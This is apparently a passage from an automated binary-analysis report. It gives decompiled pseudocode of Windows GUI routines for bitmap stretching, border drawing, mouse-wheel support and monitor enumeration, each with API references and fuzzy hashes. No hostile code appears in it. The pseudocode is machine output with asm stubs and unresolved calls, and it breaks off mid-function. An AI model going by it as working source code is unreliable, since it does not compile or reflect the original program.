                                                                                			E004201CC(struct HDC__* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
                                                                                				void* _v8;
                                                                                				int _v12;
                                                                                				int _v16;
                                                                                				void* _v20;
                                                                                				int _v24;
                                                                                				struct HDC__* _v28;
                                                                                				struct HDC__* _v32;
                                                                                				int _v48;
                                                                                				int _v52;
                                                                                				void _v56;
                                                                                				int _t37;
                                                                                				void* _t41;
                                                                                				int _t43;
                                                                                				void* _t47;
                                                                                				void* _t72;
                                                                                				intOrPtr _t79;
                                                                                				intOrPtr _t80;
                                                                                				void* _t85;
                                                                                				void* _t87;
                                                                                				void* _t88;
                                                                                				intOrPtr _t89;
                                                                                
                                                                                				_t87 = _t88;
                                                                                				_t89 = _t88 + 0xffffffcc;
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				_t71 = __ecx;
                                                                                				_v8 = __eax;
                                                                                				_push(0);
                                                                                				L00406A58();
                                                                                				_v28 = __eax;
                                                                                				_push(0);
                                                                                				L00406A58();
                                                                                				_v32 = __eax;
                                                                                				_push(_t87);
                                                                                				_push(0x42031a);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t89;
                                                                                				_t37 = GetObjectA(_v8, 0x18,  &_v56);
                                                                                				if(__ecx == 0) {
                                                                                					_push(0);
                                                                                					L00406E20();
                                                                                					_v24 = _t37;
                                                                                					if(_v24 == 0) {
                                                                                						E00420114(__ecx);
                                                                                					}
                                                                                					_push(_t87);
                                                                                					_push(0x420289);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t89;
                                                                                					_push(_v12);
                                                                                					_push(_v16);
                                                                                					_t41 = _v24;
                                                                                					_push(_t41);
                                                                                					L00406A50();
                                                                                					_v20 = _t41;
                                                                                					if(_v20 == 0) {
                                                                                						E00420114(_t71);
                                                                                					}
                                                                                					_pop(_t79);
                                                                                					 *[fs:eax] = _t79;
                                                                                					_push(0x420290);
                                                                                					_t43 = _v24;
                                                                                					_push(_t43);
                                                                                					_push(0);
                                                                                					L00407080();
                                                                                					return _t43;
                                                                                				} else {
                                                                                					_push(0);
                                                                                					_push(1);
                                                                                					_push(1);
                                                                                					_push(_v12);
                                                                                					_t47 = _v16;
                                                                                					_push(_t47);
                                                                                					L00406A40();
                                                                                					_v20 = _t47;
                                                                                					if(_v20 != 0) {
                                                                                						_t72 = SelectObject(_v28, _v8);
                                                                                						_t85 = SelectObject(_v32, _v20);
                                                                                						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
                                                                                						if(_t72 != 0) {
                                                                                							SelectObject(_v28, _t72);
                                                                                						}
                                                                                						if(_t85 != 0) {
                                                                                							SelectObject(_v32, _t85);
                                                                                						}
                                                                                					}
                                                                                					_pop(_t80);
                                                                                					 *[fs:eax] = _t80;
                                                                                					_push(E00420321);
                                                                                					DeleteDC(_v28);
                                                                                					return DeleteDC(_v32);
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                • 72E7A590.GDI32(00000000), ref: 004201E3
                                                                                • 72E7A590.GDI32(00000000,00000000), ref: 004201ED
                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 0042020D
                                                                                • 72E7A410.GDI32(?,?,00000001,00000001,00000000,?,00000018,?,00000000,0042031A,?,00000000,00000000), ref: 00420224
                                                                                • 72E7AC50.USER32(00000000,?,00000018,?,00000000,0042031A,?,00000000,00000000), ref: 00420230
                                                                                • 72E7A520.GDI32(00000000,?,?,00000000,00420289,?,00000000,?,00000018,?,00000000,0042031A,?,00000000,00000000), ref: 0042025D
                                                                                • 72E7B380.USER32(00000000,00000000,00420290,00000000,00420289,?,00000000,?,00000018,?,00000000,0042031A,?,00000000,00000000), ref: 00420283
                                                                                • SelectObject.GDI32(?,?), ref: 0042029E
                                                                                • SelectObject.GDI32(?,00000000), ref: 004202AD
                                                                                • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 004202D9
                                                                                • SelectObject.GDI32(?,00000000), ref: 004202E7
                                                                                • SelectObject.GDI32(?,00000000), ref: 004202F5
                                                                                • DeleteDC.GDI32(?), ref: 0042030B
                                                                                • DeleteDC.GDI32(?), ref: 00420314
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Object$Select$A590Delete$A410A520B380Stretch
                                                                                • String ID:
                                                                                • API String ID: 956127455-0
                                                                                • Opcode ID: def52988ccf9f29a98a0ce8aab8240d9a233bbc5dca25520826afe0c81d20552
                                                                                • Instruction ID: 7d38c530bc7270683e9fe1384592e284e1f201ef5219feca1b4d3c6428f362da
                                                                                • Opcode Fuzzy Hash: def52988ccf9f29a98a0ce8aab8240d9a233bbc5dca25520826afe0c81d20552
                                                                                • Instruction Fuzzy Hash: 5F410AB1B40219AFDB00EAE9D846FAFB7FCEB09704F514466F615F7281C6786D108B68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 50%
                                                                                			E0043CB6C(intOrPtr* __eax, intOrPtr __edx) {
                                                                                				intOrPtr* _v8;
                                                                                				intOrPtr _v12;
                                                                                				struct HDC__* _v16;
                                                                                				struct tagRECT _v32;
                                                                                				struct tagRECT _v48;
                                                                                				void* _v64;
                                                                                				struct HDC__* _t115;
                                                                                				void* _t166;
                                                                                				intOrPtr* _t188;
                                                                                				intOrPtr* _t191;
                                                                                				void* _t200;
                                                                                				intOrPtr _t207;
                                                                                				signed int _t224;
                                                                                				void* _t227;
                                                                                				void* _t229;
                                                                                				intOrPtr _t230;
                                                                                
                                                                                				_t227 = _t229;
                                                                                				_t230 = _t229 + 0xffffffc4;
                                                                                				_v12 = __edx;
                                                                                				_v8 = __eax;
                                                                                				if( *(_v8 + 0x165) != 0 ||  *(_v8 + 0x16c) > 0) {
                                                                                					_t115 = E0043BD14(_v8);
                                                                                					_push(_t115);
                                                                                					L00406F20();
                                                                                					_v16 = _t115;
                                                                                					_push(_t227);
                                                                                					_push(0x43cdd2);
                                                                                					_push( *[fs:edx]);
                                                                                					 *[fs:edx] = _t230;
                                                                                					GetClientRect(E0043BD14(_v8),  &_v32);
                                                                                					GetWindowRect(E0043BD14(_v8),  &_v48);
                                                                                					MapWindowPoints(0, E0043BD14(_v8),  &_v48, 2);
                                                                                					OffsetRect( &_v32,  ~(_v48.left),  ~(_v48.top));
                                                                                					ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom);
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					InflateRect( &_v32,  *(_v8 + 0x16c),  *(_v8 + 0x16c));
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					if( *(_v8 + 0x165) != 0) {
                                                                                						_t200 = 0;
                                                                                						if( *(_v8 + 0x163) != 0) {
                                                                                							_t200 = 0 +  *((intOrPtr*)(_v8 + 0x168));
                                                                                						}
                                                                                						if( *(_v8 + 0x164) != 0) {
                                                                                							_t200 = _t200 +  *((intOrPtr*)(_v8 + 0x168));
                                                                                						}
                                                                                						_t224 = GetWindowLongA(E0043BD14(_v8), 0xfffffff0);
                                                                                						if(( *(_v8 + 0x162) & 0x00000001) != 0) {
                                                                                							_v48.left = _v48.left - _t200;
                                                                                						}
                                                                                						if(( *(_v8 + 0x162) & 0x00000002) != 0) {
                                                                                							_v48.top = _v48.top - _t200;
                                                                                						}
                                                                                						if(( *(_v8 + 0x162) & 0x00000004) != 0) {
                                                                                							_v48.right = _v48.right + _t200;
                                                                                						}
                                                                                						if((_t224 & 0x00200000) != 0) {
                                                                                							_t191 =  *0x486b30; // 0x487a94
                                                                                							_v48.right = _v48.right +  *((intOrPtr*)( *_t191))(0x14);
                                                                                						}
                                                                                						if(( *(_v8 + 0x162) & 0x00000008) != 0) {
                                                                                							_v48.bottom = _v48.bottom + _t200;
                                                                                						}
                                                                                						if((_t224 & 0x00100000) != 0) {
                                                                                							_t188 =  *0x486b30; // 0x487a94
                                                                                							_v48.bottom = _v48.bottom +  *((intOrPtr*)( *_t188))(0x15);
                                                                                						}
                                                                                						DrawEdge(_v16,  &_v48,  *(0x46b99c + ( *(_v8 + 0x163) & 0x000000ff) * 4) |  *(0x46b9ac + ( *(_v8 + 0x164) & 0x000000ff) * 4),  *(_v8 + 0x162) & 0x000000ff |  *(0x46b9bc + ( *(_v8 + 0x165) & 0x000000ff) * 4) |  *(0x46b9cc + ( *(_v8 + 0x1a5) & 0x000000ff) * 4) | 0x00002000);
                                                                                					}
                                                                                					IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom);
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					OffsetRect( &_v48,  ~_v48,  ~(_v48.top));
                                                                                					FillRect(_v16,  &_v48, E0041F36C( *((intOrPtr*)(_v8 + 0x170))));
                                                                                					_pop(_t207);
                                                                                					 *[fs:eax] = _t207;
                                                                                					_push(0x43cdd9);
                                                                                					_push(_v16);
                                                                                					_t166 = E0043BD14(_v8);
                                                                                					_push(_t166);
                                                                                					L00407080();
                                                                                					return _t166;
                                                                                				} else {
                                                                                					return  *((intOrPtr*)( *_v8 - 0x10))();
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                • 72E7B080.USER32(00000000), ref: 0043CBA0
                                                                                • GetClientRect.USER32 ref: 0043CBC3
                                                                                • GetWindowRect.USER32 ref: 0043CBD5
                                                                                • MapWindowPoints.USER32 ref: 0043CBEB
                                                                                • OffsetRect.USER32(?,?,?), ref: 0043CC00
                                                                                • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 0043CC19
                                                                                • InflateRect.USER32(?,00000000,00000000), ref: 0043CC37
                                                                                • GetWindowLongA.USER32 ref: 0043CC8D
                                                                                • DrawEdge.USER32(?,?,00000000,00000008), ref: 0043CD59
                                                                                • IntersectClipRect.GDI32(?,?,?,?,?), ref: 0043CD72
                                                                                • OffsetRect.USER32(?,?,?), ref: 0043CD91
                                                                                • FillRect.USER32 ref: 0043CDAD
                                                                                • 72E7B380.USER32(00000000,?,0043CDD9,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 0043CDCC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Rect$Window$ClipOffset$B080B380ClientDrawEdgeExcludeFillInflateIntersectLongPoints
                                                                                • String ID:
                                                                                • API String ID: 156109915-0
                                                                                • Opcode ID: aac0cf2e32b499766f63477c942ff39a3e6c89f4748efe3072f24333a8105011
                                                                                • Instruction ID: 87f5691973d99f2f36ea90999ad42d0aa71137b0dd96603b0bfef02937046dfa
                                                                                • Opcode Fuzzy Hash: aac0cf2e32b499766f63477c942ff39a3e6c89f4748efe3072f24333a8105011
                                                                                • Instruction Fuzzy Hash: C781F571E00209AFCB41DBA9C985EEEB7F9AF09304F1440A6F514F7292C779AE04CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E004072BC(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
                                                                                				intOrPtr* _v8;
                                                                                				struct HWND__* _t19;
                                                                                				int* _t20;
                                                                                				int* _t26;
                                                                                				int* _t27;
                                                                                
                                                                                				_t26 = _t20;
                                                                                				_t27 = __edx;
                                                                                				_v8 = __eax;
                                                                                				_t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
                                                                                				 *_v8 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
                                                                                				 *_t27 = RegisterClipboardFormatA("MSH_WHEELSUPPORT_MSG");
                                                                                				 *_t26 = RegisterClipboardFormatA("MSH_SCROLL_LINES_MSG");
                                                                                				if( *_t27 == 0 || _t19 == 0) {
                                                                                					 *_a8 = 0;
                                                                                				} else {
                                                                                					 *_a8 = SendMessageA(_t19,  *_t27, 0, 0);
                                                                                				}
                                                                                				if( *_t26 == 0 || _t19 == 0) {
                                                                                					 *_a4 = 3;
                                                                                				} else {
                                                                                					 *_a4 = SendMessageA(_t19,  *_t26, 0, 0);
                                                                                				}
                                                                                				return _t19;
                                                                                			}

                                                                                APIs
                                                                                • FindWindowA.USER32 ref: 004072D4
                                                                                • RegisterClipboardFormatA.USER32 ref: 004072E0
                                                                                • RegisterClipboardFormatA.USER32 ref: 004072EF
                                                                                • RegisterClipboardFormatA.USER32 ref: 004072FB
                                                                                • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00407313
                                                                                • SendMessageA.USER32(00000000,?,00000000,00000000), ref: 00407337
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: ClipboardFormatRegister$MessageSend$FindWindow
                                                                                • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                                                                • API String ID: 1416857345-3736581797
                                                                                • Opcode ID: 2c9b3530a110b372408bf4c6c2d965b1754e1e16bcc24b4688114d6c705e0e5e
                                                                                • Instruction ID: c3ea70c89f0ea32afbae36cd1b4525e37670a6f3dc8583698f1fb75301f17434
                                                                                • Opcode Fuzzy Hash: 2c9b3530a110b372408bf4c6c2d965b1754e1e16bcc24b4688114d6c705e0e5e
                                                                                • Instruction Fuzzy Hash: 56113D70A48302AFF3109FA5C841F6AB7A8EF44350F204136BD40AB2C1D6B97D40D7AA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 88%
                                                                                			E00426730(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
                                                                                				struct tagPOINT _v12;
                                                                                				int _v16;
                                                                                				struct tagRECT _v32;
                                                                                				struct tagRECT _v48;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				void* _t60;
                                                                                				int _t61;
                                                                                				RECT* _t64;
                                                                                				struct HDC__* _t65;
                                                                                
                                                                                				_t64 = _a8;
                                                                                				_t65 = _a4;
                                                                                				if( *0x487ac3 != 0) {
                                                                                					_t61 = 0;
                                                                                					if(_a12 == 0) {
                                                                                						L14:
                                                                                						return _t61;
                                                                                					}
                                                                                					_v32.left = 0;
                                                                                					_v32.top = 0;
                                                                                					_v32.right = GetSystemMetrics(0);
                                                                                					_v32.bottom = GetSystemMetrics(1);
                                                                                					if(_t65 == 0) {
                                                                                						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
                                                                                							L13:
                                                                                							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
                                                                                						} else {
                                                                                							_t61 = 1;
                                                                                						}
                                                                                						goto L14;
                                                                                					}
                                                                                					_v16 = GetClipBox(_t65,  &_v48);
                                                                                					if(GetDCOrgEx(_t65,  &_v12) == 0) {
                                                                                						goto L14;
                                                                                					}
                                                                                					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
                                                                                					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
                                                                                						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
                                                                                							goto L13;
                                                                                						}
                                                                                						if(_v16 == 1) {
                                                                                							_t61 = 1;
                                                                                						}
                                                                                						goto L14;
                                                                                					} else {
                                                                                						goto L13;
                                                                                					}
                                                                                				}
                                                                                				 *0x487ab0 = E00426184(7, _t60,  *0x487ab0, _t64, _t65);
                                                                                				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
                                                                                				goto L14;
                                                                                			}
















                                                                                APIs
                                                                                • EnumDisplayMonitors.USER32(?,?,?,?), ref: 00426769
                                                                                • GetSystemMetrics.USER32 ref: 0042678E
                                                                                • GetSystemMetrics.USER32 ref: 00426799
                                                                                • GetClipBox.GDI32(?,?), ref: 004267AB
                                                                                • GetDCOrgEx.GDI32(?,?), ref: 004267B8
                                                                                • OffsetRect.USER32(?,?,?), ref: 004267D1
                                                                                • IntersectRect.USER32 ref: 004267E2
                                                                                • IntersectRect.USER32 ref: 004267F8
                                                                                  • Part of subcall function 00426184: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00426204
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
                                                                                • String ID: EnumDisplayMonitors
                                                                                • API String ID: 362875416-2491903729
                                                                                • Opcode ID: 1bceec31a97047a135f8e3041124f4b3fe8bd7a74cfebfffb60f8441dabb4c7a
                                                                                • Instruction ID: 5c2863997b3cb52ba5e54f8a7e46798dd5e683742b03c6a955819f0358736904
                                                                                • Opcode Fuzzy Hash: 1bceec31a97047a135f8e3041124f4b3fe8bd7a74cfebfffb60f8441dabb4c7a
                                                                                • Instruction Fuzzy Hash: EC3130B2E05119AFDB10DFA5E8449EFB7BCEF09304F51452BE915E2240EB38DA118BA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 71%
                                                                                			E00423C56(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                				intOrPtr _v8;
                                                                                				void* _v12;
                                                                                				char _v13;
                                                                                				struct tagPOINT _v21;
                                                                                				struct HDC__* _v28;
                                                                                				void* _v32;
                                                                                				intOrPtr _t74;
                                                                                				struct HDC__* _t76;
                                                                                				signed int _t78;
                                                                                				signed int _t79;
                                                                                				char _t80;
                                                                                				void* _t87;
                                                                                				struct HDC__* _t110;
                                                                                				void* _t131;
                                                                                				struct HDC__* _t155;
                                                                                				intOrPtr* _t159;
                                                                                				intOrPtr _t167;
                                                                                				signed int _t168;
                                                                                				intOrPtr _t171;
                                                                                				intOrPtr _t173;
                                                                                				intOrPtr _t175;
                                                                                				int* _t179;
                                                                                				intOrPtr _t181;
                                                                                				void* _t183;
                                                                                				void* _t184;
                                                                                				intOrPtr _t185;
                                                                                
                                                                                				_t160 = __ecx;
                                                                                				_t183 = _t184;
                                                                                				_t185 = _t184 + 0xffffffe4;
                                                                                				_t179 = __ecx;
                                                                                				_v8 = __edx;
                                                                                				_t159 = __eax;
                                                                                				_t181 =  *((intOrPtr*)(__eax + 0x28));
                                                                                				_t167 =  *0x423ea4; // 0xf
                                                                                				E0041FE98(_v8, __ecx, _t167);
                                                                                				E004242C8(_t159);
                                                                                				_v12 = 0;
                                                                                				_v13 = 0;
                                                                                				_t74 =  *((intOrPtr*)(_t181 + 0x10));
                                                                                				if(_t74 != 0) {
                                                                                					_push(0xffffffff);
                                                                                					_push(_t74);
                                                                                					_t155 =  *(_v8 + 4);
                                                                                					_push(_t155);
                                                                                					L00406BD0();
                                                                                					_v12 = _t155;
                                                                                					_push( *(_v8 + 4));
                                                                                					L00406BA0();
                                                                                					_v13 = 1;
                                                                                				}
                                                                                				_push(0xc);
                                                                                				_t76 =  *(_v8 + 4);
                                                                                				_push(_t76);
                                                                                				L00406AF8();
                                                                                				_push(_t76);
                                                                                				_push(0xe);
                                                                                				_t78 =  *(_v8 + 4);
                                                                                				L00406AF8();
                                                                                				_t168 = _t78;
                                                                                				_t79 = _t168 * _t78;
                                                                                				if(_t79 > 8) {
                                                                                					L5:
                                                                                					_t80 = 0;
                                                                                				} else {
                                                                                					_t160 =  *(_t181 + 0x28) & 0x0000ffff;
                                                                                					if(_t79 < ( *(_t181 + 0x2a) & 0x0000ffff) * ( *(_t181 + 0x28) & 0x0000ffff)) {
                                                                                						_t80 = 1;
                                                                                					} else {
                                                                                						goto L5;
                                                                                					}
                                                                                				}
                                                                                				if(_t80 == 0) {
                                                                                					if(E00423FE4(_t159) == 0) {
                                                                                						SetStretchBltMode(E0041FDC4(_v8), 3);
                                                                                					}
                                                                                				} else {
                                                                                					GetBrushOrgEx( *(_v8 + 4),  &_v21);
                                                                                					SetStretchBltMode( *(_v8 + 4), 4);
                                                                                					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
                                                                                				}
                                                                                				_push(_t183);
                                                                                				_push(0x423e95);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t185;
                                                                                				if( *((intOrPtr*)( *_t159 + 0x28))() != 0) {
                                                                                					E00424268(_t159, _t160);
                                                                                				}
                                                                                				_t87 = E00423F28(_t159);
                                                                                				_t171 =  *0x423ea4; // 0xf
                                                                                				E0041FE98(_t87, _t160, _t171);
                                                                                				if( *((intOrPtr*)( *_t159 + 0x28))() == 0) {
                                                                                					StretchBlt( *(_v8 + 4),  *_t179, _t179[1], _t179[2] -  *_t179, _t179[3] - _t179[1],  *(E00423F28(_t159) + 4), 0, 0,  *(_t181 + 0x1c),  *(_t181 + 0x20),  *(_v8 + 0x20));
                                                                                					_pop(_t173);
                                                                                					 *[fs:eax] = _t173;
                                                                                					_push(E00423E9C);
                                                                                					if(_v13 != 0) {
                                                                                						_push(0xffffffff);
                                                                                						_push(_v12);
                                                                                						_t110 =  *(_v8 + 4);
                                                                                						_push(_t110);
                                                                                						L00406BD0();
                                                                                						return _t110;
                                                                                					}
                                                                                					return 0;
                                                                                				} else {
                                                                                					_v32 = 0;
                                                                                					_v28 = 0;
                                                                                					_push(_t183);
                                                                                					_push(0x423e2a);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t185;
                                                                                					L00406A58();
                                                                                					_v28 = E004201BC(0);
                                                                                					_v32 = SelectObject(_v28,  *(_t181 + 0xc));
                                                                                					E00420360( *(_v8 + 4), _t159, _t179[1],  *_t179, _t179, _t181, 0, 0, _v28,  *(_t181 + 0x20),  *(_t181 + 0x1c), 0, 0,  *(E00423F28(_t159) + 4), _t179[3] - _t179[1], _t179[2] -  *_t179);
                                                                                					_t131 = 0;
                                                                                					_t175 = 0;
                                                                                					 *[fs:eax] = _t175;
                                                                                					_push(0x423e6f);
                                                                                					if(_v32 != 0) {
                                                                                						_t131 = SelectObject(_v28, _v32);
                                                                                					}
                                                                                					if(_v28 != 0) {
                                                                                						return DeleteDC(_v28);
                                                                                					}
                                                                                					return _t131;
                                                                                				}
                                                                                			}






























                                                                                APIs
                                                                                  • Part of subcall function 004242C8: 72E7AC50.USER32(00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 0042431E
                                                                                  • Part of subcall function 004242C8: 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 00424333
                                                                                  • Part of subcall function 004242C8: 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 0042433D
                                                                                  • Part of subcall function 004242C8: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 00424361
                                                                                  • Part of subcall function 004242C8: 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 0042436C
                                                                                • 72E7B410.GDI32(?,?,000000FF), ref: 00423C9A
                                                                                • 72E7B150.GDI32(?,?,?,000000FF), ref: 00423CA9
                                                                                • 72E7AD70.GDI32(?,0000000C), ref: 00423CBB
                                                                                • 72E7AD70.GDI32(?,0000000E,00000000,?,0000000C), ref: 00423CCA
                                                                                • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 00423CFE
                                                                                • SetStretchBltMode.GDI32(?,00000004), ref: 00423D0C
                                                                                • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00423D24
                                                                                • 72E7A590.GDI32(00000000,00000000,00423E2A,?,?,0000000E,00000000,?,0000000C), ref: 00423DA1
                                                                                • SelectObject.GDI32(?,?), ref: 00423DB6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                 • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                 • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                 • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                 • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                 • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                 • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Brush$A590B150B380B410CreateHalftoneModeObjectPaletteSelectStretch
                                                                                • String ID:
                                                                                • API String ID: 1694230195-0
                                                                                • Opcode ID: 12acc6d8c85570ecbd788fee79e40e5dfd11f6c11a147245e055a6f39af01ba2
                                                                                • Instruction ID: 825b2f3cc26a81e0a9d54884291c02793650457c26c19799d0130e999e4e799f
                                                                                • Opcode Fuzzy Hash: 12acc6d8c85570ecbd788fee79e40e5dfd11f6c11a147245e055a6f39af01ba2
                                                                                • Instruction Fuzzy Hash: 10514971B00215AFCB40EFA9D985E5EBBF8AB09304F51846AF508EB291D638EE44CB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 83%
                                                                                			E00439F44(intOrPtr* __eax, void* __edx) {
                                                                                				struct HDC__* _v8;
                                                                                				void* _v12;
                                                                                				void* _v16;
                                                                                				struct tagPAINTSTRUCT _v80;
                                                                                				intOrPtr _v84;
                                                                                				void* _v96;
                                                                                				struct HDC__* _v104;
                                                                                				void* _v112;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				void* _t38;
                                                                                				struct HDC__* _t47;
                                                                                				struct HDC__* _t55;
                                                                                				intOrPtr* _t83;
                                                                                				intOrPtr _t102;
                                                                                				void* _t103;
                                                                                				void* _t108;
                                                                                				void* _t111;
                                                                                				void* _t113;
                                                                                				intOrPtr _t114;
                                                                                
                                                                                				_t111 = _t113;
                                                                                				_t114 = _t113 + 0xffffff94;
                                                                                				_push(_t103);
                                                                                				_t108 = __edx;
                                                                                				_t83 = __eax;
                                                                                				if( *((char*)(__eax + 0x1f8)) == 0 ||  *((intOrPtr*)(__edx + 4)) != 0) {
                                                                                					if(( *(_t83 + 0x55) & 0x00000001) != 0 || E00438B9C(_t83) != 0) {
                                                                                						_t38 = E00439A64(_t83, _t83, _t108, _t103, _t108);
                                                                                					} else {
                                                                                						_t38 =  *((intOrPtr*)( *_t83 - 0x10))();
                                                                                					}
                                                                                					return _t38;
                                                                                				} else {
                                                                                					L00406E20();
                                                                                					 *((intOrPtr*)( *__eax + 0x44))();
                                                                                					 *((intOrPtr*)( *__eax + 0x44))();
                                                                                					_t47 = _v104;
                                                                                					L00406A50();
                                                                                					_v12 = _t47;
